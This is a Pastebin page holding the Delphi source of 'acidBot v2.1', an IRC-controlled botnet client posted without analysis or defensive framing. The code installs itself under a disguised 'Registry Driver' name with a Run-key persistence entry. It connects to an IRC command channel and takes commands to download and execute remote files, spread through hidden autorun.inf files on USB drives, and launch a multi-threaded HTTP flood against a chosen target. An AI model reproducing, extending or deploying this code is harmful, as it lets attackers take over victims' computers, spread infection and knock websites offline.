Advertisement
FlyFar

acidBot2.dpr

Dec 19th, 2023
1,245
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Delphi 9.20 KB | Cybersecurity | 0 0
  1. program acidBot2;
  2. // acidBot v2.1 by Acid/HuckJam
  3. // This bot was made to show that Delphi
  4. // is perfectly fine for bots too.
  5.  
  6. // Credits to Aphex for his TThread & ApplicationUnit.
  7.  
  8. uses
  9.   Windows,
  10.   WinSock,
  11.   ShellAPI,
  12.   abEncryption,
  13.   abFunctions,
  14.   abWinsock,
  15.   abThreads,
  16.   abApplication,
  17.   abHTTPFlood;
  18.  
  19. var
  20.   IRCDInfo: array[1..4] of String = ('10.0.0.3', '32828', '#kewl', '');
  21.   FileInfo: array[1..4] of String = ('regdrv.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'Registry Driver', 'aB2-Mutex');
  22.   AuthInfo: array[1..3] of String = ('*!*@*', 'mypassword', '!');
  23.   BotComnd: array[1..11] of String = ('login', 'logout', 'uninstall', 'die', 'version', 'sysinfo', 'opensite', 'download', 'spread', 'httpflood', 'httpfloodstop');
  24.   IRCProto: array[1..7] of String = ('����', '����', '����', '����', '����', '���', '�������');
  25.  
  26. var
  27.   Application: TApplication;
  28.   ircSocket: TClientSocket;
  29.   GetPath, AuthName, BotName, Master, Target: String;
  30.   Port: Integer;
  31.   Mutex: Cardinal;
  32.   LoggedIn, PrivateMsg, Spread, Flooding: Boolean;
  33.  
  34. procedure DecryptStrings();
  35. var
  36.   I: Integer;
  37. begin
  38.   for I := 1 to 7 do IRCProto[I] := Decrypt(IRCProto[I]);
  39. end;
  40.  
  41. procedure SendMessage(Msg: String);
  42. begin
  43.   if PrivateMsg then ircSocket.SendString(IRCProto[7] + ' ' + Master + ' :' + Msg + #10#13) else
  44.   ircSocket.SendString(IRCProto[7] + ' ' + IRCDInfo[3] + ' :' + Msg + #10#13);
  45. end;
  46.  
  47. procedure HTTPFloodThread();
  48. var
  49.   httpSocket: TClientSocket;
  50.   Site: String;
  51. begin
  52.   httpSocket := TClientSocket.Create;
  53.   while Flooding do
  54.   begin
  55.     httpSocket.Connect(Target, Port);
  56.     if httpSocket.Connected then
  57.     begin
  58.       Site := 'http://' + Target;
  59.       httpSocket.SendString(CreateHTTPRequest(Site));
  60.       httpSocket.Disconnect;
  61.       Sleep(1);
  62.       Application.ProcessMessages;
  63.     end;
  64.   end;
  65.   httpSocket.Free;
  66. end;
  67.  
  68. procedure SpreadUSB();
  69. var
  70.   Drive: Char;
  71.   Path: String;
  72.   AutoStart: TextFile;
  73. begin
  74.   while Spread do
  75.   begin
  76.     for Drive := 'B' to 'Z' do
  77.     begin
  78.       if GetDriveType(PChar(Drive + ':\')) = DRIVE_REMOVABLE then
  79.       begin
  80.         Path := Drive + ':\' + FileInfo[1];
  81.         if FileExists(Path) = False then
  82.         begin
  83.           CopyFile(PChar(ParamStr(0)), PChar(Path), False);
  84.           SetFileAttributes(PChar(Path), FILE_ATTRIBUTE_HIDDEN);
  85.           AssignFile(AutoStart, Drive + ':\' + 'autorun.inf');
  86.           ReWrite(AutoStart);
  87.           WriteLn(AutoStart, '[autorun]');
  88.           WriteLn(AutoStart, 'open=' + FileInfo[1]);
  89.           CloseFile(AutoStart);
  90.           SetFileAttributes(PChar(Drive + ':\' + 'autorun.inf'), FILE_ATTRIBUTE_HIDDEN);
  91.           SendMessage('[Spread] Device found, file dropped.');
  92.         end;
  93.       end;
  94.     end;
  95.     Sleep(30000);
  96.   end;
  97. end;
  98.  
  99. procedure Install(Uninstall: Integer);
  100. begin
  101.   if Uninstall = 0 then
  102.   begin
  103.     if MatchStrings(ParamStr(0), GetPath) = False then
  104.     begin
  105.       CopyFile(PChar(ParamStr(0)), PChar(GetPath), False);
  106.       ExecuteFile(GetPath);
  107.       ExitProcess(0);
  108.     end else InsertRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3], GetPath);
  109.   end else
  110.   if Uninstall = 1 then
  111.   begin
  112.     DeleteRegValue(HKEY_CURRENT_USER, FileInfo[2], FileInfo[3]);
  113.     DeleteSelf(ParamStr(0));
  114.     ExitProcess(0);
  115.   end;
  116. end;
  117.  
  118. procedure ParseIRC(RawData: String);
  119. var
  120.   Trimmed: String;
  121.   Param: array[1..4] of String;
  122.   RawDataBack: String;
  123.   I: Integer;
  124. begin
  125.   if (CheckAuthHost(AuthInfo[1], RawData)) and (Pos(IRCProto[7], RawData) > 0) then
  126.   begin
  127.     RawDataBack := RawData;
  128.     Delete(RawDataBack, 1, 1);
  129.     Master := Copy(RawDataBack, 1, Pos('!', RawDataBack) - 1);
  130.     if Pos(BotName, RawDataBack) > 7 then PrivateMsg := True else PrivateMsg := False;
  131.     if PrivateMsg then Delete(RawDataBack, 1, Pos(BotName + ' :', RawDataBack) + Length(BotName) + 1) else
  132.     Delete(RawDataBack, 1, Pos(IRCDInfo[3] + ' :', RawDataBack) + Length(IRCDInfo[3]) + 1);
  133.     Trimmed := TrimEx(RawDataBack);
  134.     if LeftStr(Trimmed, 1) = AuthInfo[3] then
  135.     begin
  136.       Delete(Trimmed, 1, 1);
  137.  
  138.       //This is a cheap method so we don't need to make a TStringList replacement.
  139.       //There might be a better way but this is what I chose.
  140.       Param[1] := Split(Trimmed, ' ', 1);
  141.       Param[2] := Split(Trimmed, ' ', 2);
  142.       Param[3] := Split(Trimmed, ' ', 3);
  143.       Param[4] := Split(Trimmed, ' ', 4);
  144.  
  145.       if Param[1] = BotComnd[1] then
  146.       begin
  147.         if Param[2] = AuthInfo[2] then
  148.         begin
  149.           if LeftStr(RawData, 25) <> AuthName then
  150.           begin
  151.             LoggedIn := True;
  152.             AuthName := LeftStr(RawData, 25);
  153.             SendMessage('Welcome Master!');
  154.           end;
  155.         end;
  156.       end;
  157.  
  158.       if LoggedIn = True then
  159.       begin
  160.         if Param[1] = BotComnd[2] then
  161.         begin
  162.           LoggedIn := False;
  163.           AuthName := '';
  164.           SendMessage('I will wait for you master!');
  165.         end;
  166.       end;
  167.  
  168.       if (LoggedIn = True) and (AuthName = LeftStr(RawData, 25)) then
  169.       begin
  170.         if Trimmed = BotComnd[3] then Install(1);
  171.         if Trimmed = BotComnd[4] then ExitProcess(0);
  172.         if Trimmed = BotComnd[5] then SendMessage('acidBot v2.1');
  173.         if Trimmed = BotComnd[6] then SendMessage('OS: ' + GetWinVersion + ', Processor: ' + GetProcessorName + ', RAM: ' + GetTotalRAM + ', GFX Card: ' + GetVideoCard + ', System Uptime: ' + GetUptime);
  174.  
  175.         if Param[1] = BotComnd[7] then
  176.         begin
  177.           ShellExecute(0, 'open', PChar(Param[2]), '', '', SW_SHOW);
  178.           SendMessage('The website have been opened.');
  179.         end;
  180.  
  181.         if Param[1] = BotComnd[8] then
  182.         begin
  183.           SendMessage('Attempting to download ' + Param[2]);
  184.           if Download(Param[2], Param[3]) then
  185.           begin
  186.             if Param[4] <> '1' then SendMessage('Download Complete!');
  187.             if Param[4] = '1' then
  188.             begin
  189.               ExecuteFile(Param[3]);
  190.               SendMessage('File Downloaded & Executed!');
  191.             end;
  192.           end else SendMessage('Download Failed!');
  193.         end;
  194.  
  195.         if Param[1] = BotComnd[9] then
  196.         begin
  197.           if Param[2] = 'on' then
  198.           begin
  199.             Spread := True;
  200.             TThread.Create(@SpreadUSB, 0);
  201.             SendMessage('[Spread] Spreading ON.');
  202.           end else
  203.           if Param[2] = 'off' then
  204.           begin
  205.             Spread := False;
  206.             SendMessage('[Spread] Spreading OFF.');
  207.           end;
  208.         end;
  209.  
  210.         if Param[1] = BotComnd[10] then
  211.         begin
  212.           Flooding := True;
  213.           if Pos('http://', Param[2]) > 0 then Delete(Param[2], 1, 7);
  214.           if RightStr(Param[2], 1) = '/' then Delete(Param[2], Length(Param[2]), 1);
  215.           Target := Param[2];
  216.           Port := StrToInt(Param[3]);
  217.           for I := 0 to 20 do TThread.Create(@HTTPFloodThread, 0);
  218.           SendMessage('[HTTPFlood] Started on ' + Target);
  219.         end;
  220.  
  221.         if Param[1] = BotComnd[11] then
  222.         begin
  223.           Flooding := False;
  224.           SendMessage('[HTTPFlood] Stopped.');
  225.         end;
  226.  
  227.       end;
  228.     end;
  229.   end;
  230. end;
  231.  
  232. procedure RecieveData(Thread: TThread; Socket: TClientSocket);
  233. var
  234.  Data, Temp: String;
  235.  NonBlocking: Integer;
  236. begin
  237.  NonBlocking := 1;
  238.  IoCtlSocket(Socket.Socket, FIONBIO, NonBlocking);
  239.  while Socket.Connected do
  240.  begin
  241.   Data := Socket.ReceiveString;
  242.   if Length(Data) > 0 then
  243.   begin
  244.     while(Pos(#10, Data) <> 0) do
  245.     begin
  246.       Temp := Copy(Data, 1, Pos(#10, Data) - 1);
  247.       Delete(Data, 1, Pos(#10, Data));
  248.       ParseIRC(Temp);
  249.       if Pos(IRCProto[6], Temp) > 0 then ircSocket.SendString(IRCProto[3] + ' ' + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  250.       if (Pos(IRCProto[2], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0)then ircSocket.SendString(IRCProto[3] + ' '  + IRCDInfo[3] + ' ' + IRCDInfo[4] + #10#13);
  251.       if (Pos(IRCProto[1], LowerCase(Temp)) > 0) and (Pos(IRCProto[7], Temp) = 0) then ircSocket.SendString(ReplaceString(Temp, IRCProto[1], 'pong') + #10#13);
  252.     end;
  253.     if Temp <> '' then Temp := '';
  254.     Data := '';
  255.   end;
  256.   Sleep(1);
  257.   Application.ProcessMessages;
  258.  end;
  259.  Socket.Disconnect;
  260.  Socket.Free;
  261. end;
  262.  
  263. procedure CreateConnection(Thread: TThread);
  264. begin
  265.  while 0 < 1 do
  266.  begin
  267.    ircSocket := TClientSocket.Create;
  268.    ircSocket.Connect(IRCDInfo[1], StrToInt(IRCDInfo[2]));
  269.    if ircSocket.Connected then
  270.    begin
  271.      Randomize;
  272.      BotName := '[' + GetWinLang + '|' + IntToStr(100000000 + Random(899999999)) + ']';
  273.      ircSocket.SendString(IRCProto[4] + ' acidBot acidBot acidBot acidBot ' + #10#13);
  274.      ircSocket.SendString(IRCProto[5] + ' ' + BotName + #10#13);
  275.      RecieveData(Thread, ircSocket);
  276.    end;
  277.    Sleep(5000);
  278.  end;
  279. end;
  280.  
  281. begin
  282.   GetPath := GetAppDataPath + FileInfo[1];
  283.   DecryptStrings();
  284.   Install(0);
  285.   Mutex := CreateMutex(nil, True, PChar(FileInfo[4]));
  286.   if (Mutex = 0) or (GetLastError = ERROR_ALREADY_EXISTS) then ExitProcess(0);
  287.   DeleteFile('~SystemCache.bat');
  288.   if MatchStrings(ParamStr(0), GetPath) then
  289.   TThread.Create(@CreateConnection, 0);
  290.   Application := TApplication.Create;
  291.   while 0 < 1 do
  292.   begin
  293.     Sleep(1);
  294.     Application.ProcessMessages;
  295.   end;
  296. end.
Tags: botnet delphi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement